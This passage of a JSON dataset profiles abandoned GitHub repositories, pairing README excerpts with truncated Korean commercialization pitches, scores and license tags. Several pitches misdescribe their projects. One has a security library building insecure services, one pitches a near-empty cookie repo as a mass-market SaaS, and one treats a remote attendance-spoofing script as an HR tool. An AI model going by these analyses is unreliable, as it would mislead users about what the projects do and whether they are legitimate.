[Live Demo](https://gun-chat-dapp.web.app/)\n- Watch the [Chat Dapp Video](https://youtu.be/J5x3OMXjgMc)\n\n```\ngit clone <this-repo>\nnpm install\nnpm run dev\n```","composite_score":0.5095,"license_safety_tag":"unknown"},{"name":"stuffmatic/fSpy","github_url":"https://github.com/stuffmatic/fSpy","stars":7,"language":"TypeScript","license":"GPL-3.0","abandonment_months":42,"description":"# fSpy 보물 지도\n\n## 왜 보물인가\n사진 한 장만으로 3차원 공간의 정확한 위치와 각도를 파악할 수 있는 도구로, 영화 제작, 건축 설계, 실내 인테리어 등 다양한 분야에서 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 건축가와 인테리어 디자이너를 위한 웹 기반 공간 분석 플랫폼으로 월 구독 제공\n2. **내부","readme_excerpt":"## What is this?\n\nfSpy is an open source, cross platform app for still image camera matching. See [fspy.io](https://fspy.io) for more info. The source code is available under the GPL license.\n\n![fSpy screenshot](screenshot.jpg)\n\n## Backstory\n\nOnce upon a time I wrote BLAM, a [Blender](https://blender.org) add-on for still image camera calibration that, despite its clunky UI, has gained some popularity in the Blender community. fSpy is an attempt to bring BLAM's functionality to a wider audience in the form of a stand alone app.\n\n## Using the computed camera parameters in other applications\n\nIn theory, camera parameters computed by fSpy could be used in any application that has a notion of a 3D camera and provides some way of setting the camera parameters. If you're a Blender user, have a look at the [offical fSpy importer add-on](https://github.com/stuffmatic/fSpy-Blender). If you're using an application without a dedicated importer, you may still be able to manually copy the camera pa","composite_score":0.5095,"license_safety_tag":"restricted"},{"name":"bytefury/crater","github_url":"https://github.com/bytefury/crater","stars":7,"language":"PHP","license":"AGPL-3.0","abandonment_months":22,"description":"# Crater 저장소 분석\n\n## 왜 보물인가\n작은 기업이나 프리랜서가 직접 청구서를 만들고 고객 돈을 관리할 수 있는 통합 플랫폼으로, 복잡한 회계 프로그램 없이도 사업을 운영할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 청구서 및 결제 관리 도구로 제공하여 소상공인 고객 확보\n2. **내부 업무 도구**: 대기업","readme_excerpt":"<img src=\"https://res.cloudinary.com/bytefury/image/upload/v1574149856/Crater/craterframe.png\">\n\n## Introduction\n\nCrater is an open-source web & mobile app that helps you track expenses, payments & create professional invoices & estimates.\n\nWeb Application is made using Laravel & VueJS while the Mobile Apps are built using React Native.\n\n# Table of Contents\n\n1. [Documentation](#documentation)\n2. [Download](#download)\n3. [Mobile Apps](#mobile-apps)\n4. [Discord](#discord)\n5. [Roadmap](#roadmap)\n6. [Credits](#credits)\n7. [Help us translate](#translate)\n8. [License](#license)\n\n## Documentation\n\n- [Installation Steps](https://docs.craterapp.com/installation.html)\n- [User Guide](https://docs.craterapp.com/)\n- [Developer Guide](https://docs.craterapp.com/developer-guide.html)\n- [API Documentation](https://api-docs.craterapp.com)\n\n## Download\n\n- [Download Link](https://craterapp.com/downloads)\n\n## Mobile Apps\n\n- [Android](https://play.google.com/store/apps/details?id=com.craterapp.app)\n- [IOS]","composite_score":0.5095,"license_safety_tag":"risky"},{"name":"yangchaojiang/ZoomPreviewPicture","github_url":"https://github.com/yangchaojiang/ZoomPreviewPicture","stars":47,"language":"Java","license":"Apache-2.0","abandonment_months":63,"description":"# ZoomPreviewPicture 상용화 분석\n\n## 왜 보물인가\n사진을 크게 확대해서 자세히 볼 수 있는 기능으로, 전자상거래나 SNS 앱에서 고객 만족도를 높일 수 있는 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 쇼핑몰 SaaS**: 상품 사진을 확대해서 보는 기능을 필요로 하는 중소 쇼핑몰에 월간 구독 서비스로 제공\n2. **부동","readme_excerpt":"# ZoomPreviewPicture\n\n本项目受Google官方demo Zooming a View 启发，实现了点击小图放大至全屏预览，退出全屏恢复至原来位置这两个过程的动画过渡。\n常见应用场景如微信朋友圈照片九宫格和微信聊天图片,视频,gif预览，某些手机系统相册等viewpager图片查看 缩放 拖拽下拉缩小退出（效果同微信图片浏览）\n\n[![Download](https://api.bintray.com/packages/ycjiang/yangjiang/ImagePreview/images/download.svg) ](https://bintray.com/ycjiang/yangjiang/ImagePreview/_latestVersion)\n\n ### 特点\n   * 1.支持自定义图片加载框架。\n   * 2.支持重写activity,完成切换切换效果。\n   * 3.图片查看 缩放 拖拽下拉缩小退出。\n   * 4.支持自定义activity,Fragment。\n   * 5.支持视频和自定义视频播放控件。 \n   * 6.支持类似微信朋友圈照片九宫格和微信聊天图片预览。\n   * 7.指示器类型选择 [圆点模式(贝塞尔圆点指示器)](https://github.com/yanyiqun001/bannerDot)和数字模式。\n   * 8.增加接口实体类。不在使用数据转化。\n   * 8.支持GIF显示。\n####效果如下：\n\n![](gif/test.gif)\n\n通过Gradle抓取:\n \n```grade\n  compile 'com.ycjiang:ImagePreview:2.3.7'\n```\n \n###  1.本项目类库依赖第三库，（）\n  >>>注意: 由于的[photoview](https://github.com/chrisbanes/PhotoView)\n  1.3.1版本源代码修改采用依赖本地。重新 photoview版本库回退到1.3.1版本。\n  \n   2.3.5 新增图片只有没有放大缩小，才能拖拽图片返回，（场景预览放大情况，容易点击误返回）实例代码：\n   ````\n    GPreviewBuilder.from((Activity) context)\n                  ","composite_score":0.5095,"license_safety_tag":"safe"},{"name":"pmndrs/racing-game","github_url":"https://github.com/pmndrs/racing-game","stars":79,"language":"TypeScript","license":"MIT","abandonment_months":40,"description":"# pmndrs/racing-game 상용화 분석\n\n## 왜 보물인가\n웹 브라우저에서 바로 플레이할 수 있는 경주 게임으로, 복잡한 설치 없이 누구나 즐길 수 있는 인터랙티브 엔터테인먼트 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 스튜디오의 SaaS 플랫폼**: 웹 기반 경주 게임을 구독형으로 제공하며 월별 신규 트랙과 차량 추가 서비스\n2. ","readme_excerpt":"# 🏎️ @pmndrs/racing-game\n\n![img](thumbnail.webp)\n\nLive demo (current state): https://racing.pmnd.rs/\n\nThis project is a showcase for the feasibility of React in gaming. Every thing is a self contained component using [react-three-fiber](https://docs.pmnd.rs/react-three-fiber) to express threejs with React semantics. If that seems strange to you read [this explanation](https://twitter.com/0xca0a/status/1282999626782650368).\n\nThis project is 100% open source and community built, CC0 assets only, everyone is invited to participate. If you have a PR merged you are added to the triage team. Refer to [CONTRIBUTING.md](/CONTRIBUTING.md) for more information.\n\n```jsx\n/assets   - the blend files\n/utils    - game state store, helpers\n/models   - gltfjsx models, players, characters\n/effects  - dust, trails, skids, shaders\n/ui       - intros, heads up displays, leaderboards\n```\n\nThere is a dedicated discord channel for this project here: https://discord.gg/dQW7fDmaAG\n","composite_score":0.5095,"license_safety_tag":"safe"},{"name":"open-mmlab/mmgeneration","github_url":"https://github.com/open-mmlab/mmgeneration","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":33,"description":"# MMGeneration 저장소 분석\n\n## 왜 보물인가\nAI를 사용해 이미지, 영상, 음악 같은 창작물을 자동으로 만들어주는 기술의 모음집으로, 게임, 영화, 광고 산업에서 제작 시간과 비용을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: AI 이미지 생성 웹사이트**\n사용자가 텍스트 설명만 입력하면 인공지능이 자동으로","readme_excerpt":"<div align=\"center\">\n    <img src=\"https://user-images.githubusercontent.com/12726765/114528756-de55af80-9c7b-11eb-94d7-d3224ada1585.png\" width=\"400\"/>\n      <div>&nbsp;</div>\n   <div align=\"center\">\n     <b><font size=\"5\">OpenMMLab website</font></b>\n     <sup>\n       <a href=\"https://openmmlab.com\">\n         <i><font size=\"4\">HOT</font></i>\n       </a>\n     </sup>\n     &nbsp;&nbsp;&nbsp;&nbsp;\n     <b><font size=\"5\">OpenMMLab platform</font></b>\n     <sup>\n       <a href=\"https://platform.openmmlab.com\">\n         <i><font size=\"4\">TRY IT OUT</font></i>\n       </a>\n     </sup>\n   </div>\n   <div>&nbsp;</div>\n</div>\n\n[![PyPI](https://img.shields.io/pypi/v/mmgen)](https://pypi.org/project/mmgen)\n[![docs](https://img.shields.io/badge/docs-latest-blue)](https://mmgeneration.readthedocs.io/en/latest/)\n[![badge](https://github.com/open-mmlab/mmgeneration/workflows/build/badge.svg)](https://github.com/open-mmlab/mmgeneration/actions)\n[![codecov](https://codecov.io/gh/open-mmlab/mmgeneration/b","composite_score":0.5094,"license_safety_tag":"safe"},{"name":"AntonVanke/JDBrandMember","github_url":"https://github.com/AntonVanke/JDBrandMember","stars":9,"language":"Python","license":"MIT","abandonment_months":55,"description":"# JDBrandMember 프로젝트 분석\n\n## 왜 보물인가\n온라인 쇼핑몰에서 고객의 등급을 자동으로 관리하고 보상해주는 시스템으로, 고객 충성도를 높이는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **이커머스 SaaS 서비스**: 쇼핑몰 운영자들이 구독하여 자신의 고객 멤버십 체계를 자동 관리하는 클라우드 서비스\n2. **쇼핑몰 내부 업무 도구*","readme_excerpt":"[![GitHub all releases](https://img.shields.io/github/downloads/AntonVanke/JDBrandMember/total?style=for-the-badge)](https://github.com/AntonVanke/JDBrandMember/releases/)[![GitHub release (latest by date)](https://img.shields.io/github/v/release/AntonVanke/JDBrandMember?style=for-the-badge)](https://github.com/AntonVanke/JDBrandMember/releases/latest)\n\n## 开始之前\n\n### 风险\n\n1.  京东账号有被黑号的风险，即一定时间内不能参与活动\n2.  入会（开卡）有礼会将你的个人信息授权给店铺，所以你可能会收到店铺的推广信息\n3.  退会比较麻烦\n4.  不要泄露你的`config.yaml`\n\n### 你需要\n\n1.  电脑知道如何安装`Python3`环境；手机知道该如何在`Termux`上安装`Python3`环境，或者在`ios`上安装`Pythonista`\n    1.  电脑访问 [Python Mirror (taobao.org)](https://npm.taobao.org/mirrors/python/) 安装`Python3`\n    2.  安卓手机在各大应用商店搜索`Termux`安装后执行`pkg install python`\n2.  会获取京东账号的`cookie`即`pt_key=ABC;pt_pin=123`\n\n>   如果你不能在电脑上安装`Python`环境，你可以去[Release]([Releases · AntonVanke/JDBrandMember (github.com)](https://github.com/AntonVanke/JDBrandMember/releases))查看已经打包好的程序\n\n### 如何退会\n\n>   请查看 @yqchilde 大佬的[yqchilde/JDMemberCloseAccount](https://github.co","composite_score":0.5093,"license_safety_tag":"safe"},{"name":"georgehuan1994/DingDing-Automatic-Clock-in","github_url":"https://github.com/georgehuan1994/DingDing-Automatic-Clock-in","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":47,"description":"# DingDing-Automatic-Clock-in 보물 분석\n\n## 왜 보물인가\n직장인들이 매일 수동으로 해야 하는 '출근 등록'을 자동으로 처리해주는 도구로, 반복적인 행정 업무를 완전히 없애줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 인사 담당자 대상으로 월 구독 모델의 자동 출근 관리 플랫폼 제공\n2. **내","readme_excerpt":"## ⏰ DingDing-Automatic-Clock-in\n\n<img width=\"796\" src=\"https://user-images.githubusercontent.com/49583943/138620009-32d16b4a-d38b-4cb7-9650-db7f45f14520.png\"/>\n\n## 📖 简介\n\n钉钉全自动打卡 + 远程打卡脚本，无需 root，基于 auto.js，适用于蓝牙考勤机。\n\n## 💥 功能\n\n- 定时打卡\n- 远程打卡\n- 发送考勤结果\n\n## ⚙️ 工具\n\n- auto.js\n- Tasker\n- 一款通讯应用（示例脚本中使用的是 QQ / 网易邮箱大师 / ServerChan / PushDeer，彼此互为备用方案）\n\n## 💡 原理\n\n通过 auto.js 脚本监听本机通知，在 Tasker 中创建定时任务，发出通知，或在另一设备上发送消息到本机，即可触发脚本中的打卡进程，实现定时打卡和远程打卡。\n\n![image](https://user-images.githubusercontent.com/49583943/163506300-7ef7693b-a273-442f-8449-dcef31063069.png)\n\n同理，监听到钉钉发出的打卡成功通知后，将通知文本通过 QQ消息 或 邮件正文 发送，实现发送考勤结果的功能。\n\n## 📝 脚本\n\n```javascript\n/*\n * @Author: George Huan\n * @Date: 2020-08-03 09:30:30\n * @LastEditTime: 2022-03-26 10:56:25\n * @Description: DingDing-Automatic-Clock-in (Run on AutoJs)\n * @URL: https://github.com/georgehuan1994/DingDing-Automatic-Clock-in\n */\n\nconst ACCOUNT = \"钉钉账号\"\nconst PASSWORD = \"钉钉密码\"\n\nconst QQ =              \"用于接收打卡结果的QQ号\"\nconst EMAILL_ADDRESS =  \"用于接收打卡结果的邮箱地址\"\nconst SERV","composite_score":0.5092,"license_safety_tag":"unknown"},{"name":"dblalock/bolt","github_url":"https://github.com/dblalock/bolt","stars":110,"language":"C++","license":"mpl-2.0","abandonment_months":44,"description":"# Bolt 저장소 분석\n\n## 왜 보물인가\n데이터를 빠르게 분석하고 패턴을 찾아내는 작업을 자동화하는 도구로, 비즈니스 의사결정 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사 데이터를 자동으로 분석해 인사이트를 제공하는 분석 플랫폼\n2. **내부 업무 도구**: 판매팀이 고객 거래 패턴을 실시간으로 모니터","readme_excerpt":"\n<p align=\"center\">\n  <img src=\"https://github.com/dblalock/bolt/blob/master/assets/bolt.jpg?raw=true\" alt=\"Bolt\" width=\"611px\" height=\"221px\"/>\n  <!-- <img src=\"https://github.com/dblalock/bolt/blob/master/assets/bolt.jpg?raw=true\" alt=\"Bolt\" width=\"685px\" height=\"248px\"/> -->\n</p>\n\nBolt is an algorithm for compressing vectors of real-valued data and running mathematical operations directly on the compressed representations.\n\nIf you have a large collection of mostly-dense vectors and can tolerate lossy compression, Bolt can probably save you 10-200x space and compute time.\n\nBolt also has [theoretical guarantees](https://github.com/dblalock/bolt/blob/master/assets/bolt-theory.pdf?raw=true) bounding the errors in its approximations.\n\nEDIT: this repo now also features the source code for [MADDNESS](https://arxiv.org/abs/2106.10860), our shiny new algorithm for approximate matrix multiplication. MADDNESS has no Python wrapper yet, and is referred to as \"mithral\" in the source code. Name c","composite_score":0.5092,"license_safety_tag":"unknown"},{"name":"G-Security-Team/GSLibrary","github_url":"https://github.com/G-Security-Team/GSLibrary","stars":42,"language":"Python","license":"unknown","abandonment_months":49,"description":"# G-Security-Team/GSLibrary 분석\n\n## 왜 보물인가\n보안 관련 기능을 미리 만들어둔 라이브러리로, 이를 활용하면 보안 문제가 있는 서비스를 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인정보를 다루는 회원 관리 시스템(로그인, 권한 관리)에 탑재하여 안전성 강화\n2. **내부 업무 도구**: ","readme_excerpt":"# GSLibrary 安装手册（个人DEBUG版安装）\n![](https://img.shields.io/badge/python3-3.7-2dc937)\n![](https://img.shields.io/badge/django-2.1.7-2dc937)\n- - - -\n\n## 须知\n👻👻本知识库禁止在互联网上进行搭建，若出现互联网可访问的GSLibrary本人概不负责，欢迎关注我们的公众号。\n\n\n<img src=\"./img/1.png\" width=\"40%\">\n\n- - - -\n## 使用场景\n为了方便大家的使用本知识库可以做为个人的知识库管理工具武器库管理工具，也可以搭建在内网中作为团队的知识库和武器库管理工具，针对使用场景的不同知识库发挥的作用也不同，推荐大家搭建在内网通过团队进行维护使其一直成长下去。\n\n- - - -\n## 开发工具\n本知识库使用Python3 + Django 开发，属于轻量级知识库管理工具，他的代码量少、结构清晰。欢迎各位开发者进行二次开发。GSLibrary现在支持的功能有：\n\n\t1. 文章的书写、阅读、搜索、收藏、审核、排名\n\t2. 栏目与标签管理\n\t3. 工具的上传、下载、搜索\n\t4. 用户及邀请码管理\n\n## 安装\n### 一、数据库\n\n使用mysql数据库，安装方式任意phpstudy也可，这里测试的版本为mysql5.7与mysql8。\n\n### 二、clone 代码到本地并安装依赖\n\n```\ngit clone https://github.com/G-Security-Team/GSLibrary.git\npython3 -m pip install -r requirements.txt\n```\n\n### 三、初始化数据库\n\n可以使用图形化工具进行创建数据库，数据库名：**zslibrary**，随后选择导入sql文件选中项目目录下的zslibrary.sql即可。\n\n若您使用的是命令行，则命令如下，默认数据库密码：Gr33kLibrary_pass1997!\n```\nmysql -uroot -p\npassword:**********\n\ncreate database zslibrary;\nuse zslibrary;\nsource GSLibrary/zslibrary.sql;\n```\n\n","composite_score":0.5092,"license_safety_tag":"unknown"},{"name":"dafriedman97/mlbook","github_url":"https://github.com/dafriedman97/mlbook","stars":8,"language":"Jupyter Notebook","license":"MIT","abandonment_months":33,"description":"# mlbook 저장소 분석\n\n## 왜 보물인가\n머신러닝이라는 복잡한 AI 개념을 누구나 이해할 수 있도록 정리해놓은 교재로, 기술 학습에 목마른 사람들의 니즈를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 교육 플랫폼에서 AI/머신러닝 강의 콘텐츠로 활용하여 월 구독료 수집\n- **내부 업무 도구**: 회사 직원 교","readme_excerpt":"# Machine Learning from Scratch\n\nWelcome to the repo for my free online book, \"Machine Learning from Scratch\". \nThe book itself can be found [here](https://dafriedman97.github.io/mlbook/content/introduction.html). \n(A somewhat ugly version of) the PDF can be found in the book.pdf file above in the `master` branch. Note that JupyterBook is currently [experimenting](https://jupyterbook.org/advanced/pdf.html) with the PDF creation.\nFor suggested changes to the book, please create pull requests to the `gh-pages` branch!\n\nAny comments or questions are much appreciated, either here or via email at dafrdman@gmail.com.\n\nThanks so much!\n","composite_score":0.5092,"license_safety_tag":"safe"},{"name":"zhanghuanchong/icon-workshop","github_url":"https://github.com/zhanghuanchong/icon-workshop","stars":6,"language":"PHP","license":"NOASSERTION","abandonment_months":55,"description":"# icon-workshop 상용화 분석\n\n## 왜 보물인가\n아이콘(작은 그림 기호)을 쉽게 만들고 관리할 수 있는 도구로, 웹사이트나 앱을 만드는 모든 회사에서 필요로 하는 기본 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독료를 받고 온라인에서 아이콘 제작/편집 기능을 제공하는 웹 앱\n2. **내부 업무 도구**: 브랜드","readme_excerpt":"## 图标工场\n\n移动应用图标生成工具，一键生成所有尺寸的应用图标。\n\nhttps://icon.wuruihong.com\n\n### 功能\n\n* 生成不同移动平台（iOS/Android/Web App/Cordova/...）的应用图标，一键生成，快捷导入\n* App 启动图（Launch Image/Splash）生成工具，支持 iOS/Android\n\n### 技术栈\n\n* Laravel 8\n* Angular + Material Design\n* Vue / Quasar Framework\n\n### TODO\n\n* App 启动图\n  * 支持鼠标拖动、缩放\n  * 支持插入文本\n* 生成应用商店屏幕截图\n\n### Contributors\n\nPrimary author:\n* https://github.com/zhanghuanchong\n\nOther contributors:\n* https://github.com/kuaifan\n\n### License\n\nAGPL协议\n\n* 欢迎 PR\n* 基于本项目开发的项目，请自觉开源\n\n### 捐赠\n\n如果您感觉到图标工场能带来帮助，希望您能进行捐赠，这将是图标工场未来持续改进的保障。捐助的资金将用于：\n        \n* 站点服务器、域名费用\n* 站点日常维护\n* 新功能开发和 bug 修复\n\n在捐赠时您可以给我们留言，附上最想添加的新功能（可以用短链接形式附上详情需求），我们会根据需求度尽快开发上线。\n\n\n\n| 微信支付捐赠 | 支付宝捐赠 |\n|---| --- |\n|![微信支付捐赠](public/img/WeChatPay_sm.png)  | ![支付宝捐赠](public/img/AliPay_sm.png) |\n","composite_score":0.5092,"license_safety_tag":"unknown"},{"name":"seccome/Ehoney","github_url":"https://github.com/seccome/Ehoney","stars":7,"language":"Go","license":"Apache-2.0","abandonment_months":32,"description":"# Ehoney 저장소 분석\n\n## 왜 보물인가\n악의적인 공격자를 감시하고 포착하는 보안 함정 시스템으로, 기업의 중요한 정보를 지키는 첫 번째 방어선 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 관리 SaaS**: 중소기업의 네트워크 침입을 자동으로 감지하고 알려주는 구독형 보안 서비스\n2. **내부 업무 도구**: 대기업 IT팀이 자체","readme_excerpt":"<p align=\"center\">\n  <img width=\"200px\" src=\"./doc/img/logo_ehoney_black.svg\" alt=\"Ehoney\" />\n  <br/>\n  <br/>\n  <br> 中文 | <a href=\"README-EN.md\">English</a>\n  <h1 align=\"center\">欢迎来到Ehoney 👋</h1>\n  <br/>\n  <p align=\"center\">\n  <img align=\"center\" src=\"https://img.shields.io/badge/release-v1.0.0-green\" />\n  <img align=\"center\" src=\"https://img.shields.io/badge/language-goland-orange\" />\n  <img align=\"center\" src=\"https://img.shields.io/badge/documentation-yes-ff69b4\" />\n  <img align=\"center\" src=\"https://img.shields.io/badge/license-Apache%202-blue\" />\n  </p>\n</p>\n\n\n> ⭐️ Seccome Teamer积累十几年的安全经验，都将对外逐步开放，首开的Ehoney欺骗防御系统，该系统是基于云原生的欺骗防御系统，也是业界唯一开源的对标商业系统的产品，欺骗防御系统通过部署高交互高仿真蜜罐及流量代理转发，再结合自研密签及诱饵，将攻击者攻击引导到蜜罐中达到扰乱引导以及延迟攻击的效果，可以很大程度上保护业务的安全。`护网必备良药`，该平台只提供安全技术防护能力，任何人不得用于任何不法行为⭐️   \n\n\n![介绍视频](./doc/img/介绍.gif)\n\n\n🏠 [使用文档](https://seccome.github.io/Ehoney/) &nbsp;&nbsp; :triangular_flag_on_post: [演示环境](http://47.98.206.178:8080/decept-defense)   \n\n## 📝 特点\n\n- **支持丰富的蜜罐类型**\n\n1. **通用蜜罐**： SSH 蜜罐、Ht","composite_score":0.5091,"license_safety_tag":"safe"},{"name":"yechaoa/MaterialDesign","github_url":"https://github.com/yechaoa/MaterialDesign","stars":17,"language":"Kotlin","license":"Apache-2.0","abandonment_months":28,"description":"# MaterialDesign 저장소 분석\n\n## 왜 보물인가\n앱이나 웹사이트를 예쁘고 통일된 디자인으로 만들 수 있도록 돕는 디자인 시스템 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 빠르게 앱을 개발할 때 일관된 디자인을 적용하는 템플릿으로 사용\n2. **내부 업무 도구**: 기업의 관리자 시스템이나 직원용 애플리케이","readme_excerpt":"# MaterialDesign\n\n![](https://img.shields.io/badge/language-kotlin-orange.svg)\n![](https://img.shields.io/badge/CSDN-yechaoa-green.svg)\n![](https://img.shields.io/badge/JueJin-yechaoa-blue.svg)\n\nstar :kiss:\n\n### 环境（Environment）\n- Android Studio Giraffe | 2022.3.1 Patch 1\n- Android Gradle Plugin 8.0\n- Kotlin 1.7.10\n\n### 效果（Example）\n\n多图预警！！！\n\n| <img src=\"/gif/search_view.gif\" width=\"285\"/> | <img src=\"/gif/drawer.gif\" width=\"285\"/> | <img src=\"/gif/snackbar.gif\" width=\"285\"/> |\n| :--: | :--: | :--: |\n| 搜索 | 侧边栏、抽屉 | 底部提示 |\n\n| <img src=\"/gif/scrolling.gif\" width=\"285\"/> | <img src=\"/gif/scrolling_tab.gif\" width=\"285\"/> | <img src=\"/gif/tab.gif\" width=\"285\"/> |\n| :--: | :--: | :--: |\n| 滑动收起 | Tab滑动收起 | 自定义Tab |\n\n| <img src=\"/gif/navigation.gif\" width=\"285\"/> | <img src=\"/gif/text.gif\" width=\"285\"/> | <img src=\"/gif/swipe.gif\" width=\"285\"/> |\n| :--: | :--: | :--: |\n| 底部导航 | 输入框 | 下拉刷新 |\n\n| <img src=\"/gif/bottom_sheet.gif\" width=\"285\"/> | <img src=\"/gif/tab_layout.gif\" width=\"285\"/> | <img s","composite_score":0.5091,"license_safety_tag":"safe"},{"name":"WeiyiGeek/SecOpsDev","github_url":"https://github.com/WeiyiGeek/SecOpsDev","stars":11,"language":"Shell","license":"unknown","abandonment_months":39,"description":"# WeiyiGeek/SecOpsDev 분석 보고서\n\n## 왜 보물인가\n보안과 운영을 함께 관리하는 방법을 정리한 자료로, 기업의 시스템을 안전하게 지키면서도 효율적으로 운영하는 방법을 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안 교육 플랫폼**: 직원들에게 보안 운영 가이드를 제공하는 온라인 교육 서비스\n- **IT 관리 솔루션**: ","readme_excerpt":"## 安全运维开发\n\nTips: 本项目后期将会有更新整合, 更多脚本工具即将呼之欲出!\n\n欢迎各位朋友持续关注我的 [WeiyiGeek Blog's](https://blog.weiyigeek.top) 站点或者 [WeiyiGeek 公众号](https://www.weiyigeek.top/wechat.html?key=%E6%AC%A2%E8%BF%8E%E5%85%B3%E6%B3%A8) ，并可以在其中进行留言交流, 共同学习进步 (๑′ᴗ‵๑) ❤。\n\n\n## Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/WeiyiGeek/SecOpsDev.svg)](https://starchart.cc/WeiyiGeek/SecOpsDev)\n\n","composite_score":0.5091,"license_safety_tag":"unknown"},{"name":"krustlet/krustlet","github_url":"https://github.com/krustlet/krustlet","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":32,"description":"# Krustlet 저장소 분석\n\n## 왜 보물인가\n컨테이너 기술의 복잡한 관리를 간단하게 만드는 도구로, 기업의 클라우드 운영 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 애플리케이션 배포 플랫폼으로 월 구독료를 받고 기업 고객에게 제공\n2. **내부 업무 도구**: 대규모 IT 인프라를 보유한 기업","readme_excerpt":"⚠️ This project is currently not actively maintained. Most of the other maintainers have moved on to other WebAssembly related projects. This project could definitely still be useful to anyone who wants to write a custom Kubelet and its sister project [Krator](https://github.com/krustlet/krator) is a state machine-based solution for writing Kubernetes controllers/operators in Rust. If anyone is interested in maintaining these projects, please feel free to reach out!\n\n\n[![CII Best\nPractices](https://bestpractices.coreinfrastructure.org/projects/5292/badge)](https://bestpractices.coreinfrastructure.org/projects/5292)\n\n# Krustlet: Kubernetes Kubelet in Rust for running WASM\n\n:postal_horn: Krustlet 1.0 coming soon!\n\nKrustlet acts as a Kubelet by listening on the event stream for new pods that\nthe scheduler assigns to it based on specific Kubernetes\n[tolerations](https://kubernetes.io/docs/concepts/configuration/taint-and-toleration/).\n\nThe default implementation of Krustlet listens for the","composite_score":0.509,"license_safety_tag":"safe"},{"name":"Zy143L/jd_cookie","github_url":"https://github.com/Zy143L/jd_cookie","stars":81,"language":"","license":"unknown","abandonment_months":52,"description":"# Zy143L/jd_cookie 상용화 분석\n\n## 왜 보물인가\n온라인 쇼핑 자동화가 필요한 수백만 명의 사용자를 대상으로 시간과 수고를 절약해주는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **자동 쇼핑 SaaS**: 특정 상품 발매 시 자동으로 구매하는 구독형 서비스 (월 $9.99~$29.99)\n2. **쇼핑몰 운영 도구**: 전자상거래 플랫폼에","readme_excerpt":"# 新年快乐","composite_score":0.509,"license_safety_tag":"unknown"},{"name":"sarthaksavvy/100DaysOfAWS","github_url":"https://github.com/sarthaksavvy/100DaysOfAWS","stars":88,"language":"Shell","license":"unknown","abandonment_months":58,"description":"# 100DaysOfAWS 저장소 분석\n\n## 왜 보물인가\n아마존 클라우드 서비스(AWS)를 100일 동안 체계적으로 배우는 학습 로드맵이 이미 만들어져 있어서, 클라우드 기초부터 실무까지 자기 페이스로 학습할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 학습 플랫폼**: 회사에서 직원들의 AWS 역량 강화를 위한 표준 교육 커리큘럼으로 제공","readme_excerpt":"# 100 Days Of AWS Challenge\n**[Join Discord Server](https://discord.gg/neuKDrJ)**\n\n<a href=\"https://www.youtube.com/watch?v=77XaHwNxH68\">\n<img src=\"https://i3.ytimg.com/vi/77XaHwNxH68/hqdefault.jpg\" align=\"center\" width=\"200\" style=\"border-radius:40px\" />\n</a>\n\n- For next 100 days I will follow some course and books to learn about AWS\n- Follow along with me to learn Amazon Web Services (AWS) in details\n- I will update daily progress here share contents, videos and notes\n\n## Content to follow up\n- Basic Course - [Ultimate AWS Certified Developer Associate 2021 - NEW!](https://www.udemy.com/course/aws-certified-developer-associate-dva-c01/)\n- Hands On Course - [AWS Certified DevOps Engineer Professional 2021 - Hands On!](https://www.udemy.com/course/aws-certified-devops-engineer-professional-hands-on/)\n\nDay 1 (24 May, 2021) Getting Started with AWS [Click Here to Read More](/Day-001-100DaysOfAWS.md)\n\nDay 2 (25 May, 2021) Permission and Policies [Click Here to Read More](/Day-002-100DaysO","composite_score":0.509,"license_safety_tag":"unknown"},{"name":"jiwidi/time-series-forecasting-with-python","github_url":"https://github.com/jiwidi/time-series-forecasting-with-python","stars":6,"language":"Jupyter Notebook","license":"unknown","abandonment_months":37,"description":"# 시계열 예측 파이썬 저장소 분석\n\n## 왜 보물인가\n미래의 매출, 날씨, 주가 등을 데이터로 예측하는 기술을 누구나 쉽게 사용할 수 있도록 만들어진 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업용 매출 예측 웹 서비스로 월 구독료 받기\n- **내부 업무 도구**: 대형 유통사의 재고 예측 시스템 구축하여 낭비 줄이기","readme_excerpt":"# :hourglass_flowing_sand: time-series-forecasting-wiki\nThis repository contains a series of analysis, transforms and forecasting models frequently used when dealing with time series. The aim of this repository is to showcase how to model time series from the scratch, for this we are using a real usecase dataset ([Beijing air polution dataset](https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data) to avoid perfect use cases far from reality that are often present in this types of tutorials. If you want to rerun the notebooks make sure you install al neccesary dependencies, [Guide](docs/setup.md)\n\n<img src=\"results/beijing.jpg\">\n\n\nYou can find the more detailed toc on the main [notebook](time-series-forecasting-tutorial.ipynb) \n\n\n\n# :open_file_folder: Dataset\n\nThe dataset used is the [Beijing air quality](https://archive.ics.uci.edu/ml/datasets/Beijing+PM2.5+Data) public dataset. This dataset contains polution data from 2014 to 2019 sampled every 10 minutes along with extra 